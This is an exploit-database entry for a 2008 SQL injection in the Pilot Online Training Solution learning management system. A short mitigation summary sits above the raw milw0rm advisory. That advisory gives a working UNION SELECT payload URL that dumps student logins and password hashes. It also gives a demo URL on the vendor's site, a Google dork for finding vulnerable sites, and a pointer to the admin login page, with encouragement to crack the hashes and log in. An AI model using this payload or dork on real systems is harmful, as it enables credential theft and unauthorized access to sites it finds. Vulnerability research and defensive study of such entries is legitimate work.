Pilot Online Training Solution Remote SQL Injection Vulnerability

vendor:

learning management system

by:

S.W.A.T.

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: learning management system

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Pilot Online Training Solution Remote SQL Injection Vulnerability

A vulnerability exists in Pilot Online Training Solution which allows an attacker to inject arbitrary SQL commands. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the database, modify data, or execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+       Pilot Online Training Solution Remote SQL Injection Vulnerbility         +==--
--==+================================================================================+==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Site: http://www.elmspro.com/etraining/

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by PG Online Training Solution - learning management system"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:
www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*

Online Demo:
http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

Admin Login Is At /admin/


-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


--==+================================================================================+==--
--==+       Pilot Online Training Solution Remote SQL Injection Vulnerbility         +==--
--==+================================================================================+==--

# milw0rm.com [2008-09-28]